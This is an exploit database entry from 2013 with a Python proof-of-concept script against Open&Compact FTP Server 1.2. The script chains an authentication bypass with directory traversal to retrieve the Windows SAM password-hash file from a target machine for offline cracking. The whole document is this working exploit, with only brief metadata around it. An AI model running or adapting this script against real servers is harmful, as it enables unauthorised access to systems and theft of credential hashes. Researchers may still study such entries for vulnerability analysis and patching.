Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit

2013-08-07T00:00:00
ID 1337DAY-ID-21078
Type zdt
Reporter Wireghoul
Modified 2013-08-07T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            #!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory
traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass
(http://1337day.com/exploit/description/12783)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
 
# Abusing authentication bypass in combination with a directory traversal
to grab
# the sam file for offline cracking
import ftplib
import os
 
# Connect to server
ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )
 
# Note that we need no authentication at all!!
 
print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )
 
ftp.quit()

#  0day.today [2018-02-18]  #